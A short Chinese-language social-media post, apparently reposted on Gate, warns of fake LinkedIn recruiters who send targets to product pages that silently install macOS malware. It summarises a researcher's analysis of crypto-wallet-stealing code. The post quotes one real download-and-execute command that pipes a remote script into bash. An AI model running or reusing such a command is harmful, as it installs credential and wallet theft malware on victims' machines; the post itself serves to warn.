小心假招聘面試。它們現在已成為最乾淨的惡意軟件傳播途徑之一。


我兄弟這週差點中招。
步驟如下:
> 一個“招聘官”在LinkedIn上聯繫他
> 他們實際上已經閱讀了他的履歷。他們知道他的技術棧。他們預約了一個真正的面試時間。
> 通話前幾個小時:“你能在我們談之前快速瀏覽一下我們的產品頁面嗎?”
> 訪問該網站時,背景會執行以下命令:
curl -s macos[.]hyperhives[.]net/install | nohup bash &
如果你在提示時輸入密碼,就完了。
一位研究員(Darksp33d在Github)反向工程了這個二進制文件:
> 每個配置字符串都用570個獨特的自定義函數加密
> 解包後:完整的C2伺服器、完整的端點列表,以及一個與開發者在法律傳票下相關聯的sentry錯誤追蹤DSN
> 276個針對Chrome擴展ID,涵蓋188個加密貨幣錢包
> 與朝鮮“傳染性面試”的TTP重疊度很高
> 在VirusTotal上的得分為9/64。CrowdStrike、Sophos、Malwarebytes都未檢測出來
真正的招聘官、真正的履歷、真正的面試時間、看起來真的網站。一行curl就能掏空你的錢包。
如果“招聘官”讓你在終端中運行任何東西,即使是看似無害的構建腳本,也要關閉標籤。
查看原文
post-image
此頁面可能包含第三方內容,僅供參考(非陳述或保證),不應被視為 Gate 認可其觀點表述,也不得被視為財務或專業建議。詳見聲明
  • 打賞
  • 留言
  • 轉發
  • 分享
留言
請輸入留言內容
請輸入留言內容
暫無留言